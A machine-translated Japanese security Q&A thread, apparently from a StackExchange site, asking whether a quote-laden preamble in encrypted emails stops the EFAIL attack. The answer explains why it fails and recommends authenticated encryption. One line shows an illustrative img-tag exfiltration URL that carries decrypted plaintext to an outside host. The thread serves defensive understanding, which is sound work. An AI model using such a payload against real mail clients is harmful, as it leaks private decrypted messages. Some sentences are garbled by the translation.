これはEFAILに対する単純な保護ですか?
私が理解している方法 [〜#〜] efail [〜#〜] 、電子メールクライアントが強制的に復号化されたメッセージを攻撃者から提供されたテキストに連結してURLを生成できるため、攻撃は機能します。
しかし、次のような秘密のメッセージを送信するたびに適切なプリアンブルを使用することは、対策にならないでしょう。
Nice try " '
Secret meeting
Tomorrow 9pm
?私が攻撃を理解する方法では、これは次のような結果になります
<img src="http://efail.de/Nice%20try%" ' Secret meeting Tomorrow 9pm">
つまり、imgタグはおそらく有効ではなく、最初の「ナイストライ」だけを攻撃者に引き出します。
これは、いくつかの単純なEFAIL攻撃で機能する可能性がありますが、
- EFAILホワイトペーパー の最後のページには、EFAILの既知のバリアントがいくつかリストされています。すべてではありませんが、ほとんどが悪意のあるHTMLタグと引用文字に依存しています。 (特に、電子メールのヘッダーを介してそれを行う最後のものに注意してください。)
- 私の理解では、AES_CBCの仕組みにより、攻撃者は電子メールのどこに悪意のある
<img>タグが付いているので、あなたのトリックがわかると、Nice try " '。
一般的に言って、このような攻撃は、モグラたたきの終わりのないゲームでバンドエイドの修正を適用するのではなく、根本的な原因に対処することで最もうまく阻止されます。
EFAILの場合、根本的な原因は、HTMLコンテンツをレンダリングし、信頼できないコンテンツであっても外部リンクをたどる電子メールクライアントです。適切なソリューションは、電子メールクライアントベンダーが認証された暗号化(AES_GCM)とデジタル署名の使用についてより注意することです。
署名の検証が失敗した場合のほとんどの電子メールクライアントの現在の動作は、電子メールをレンダリングすることですが、警告バナーを上部に配置します。 EFAILの結果としてその変化が見られるのだろうか?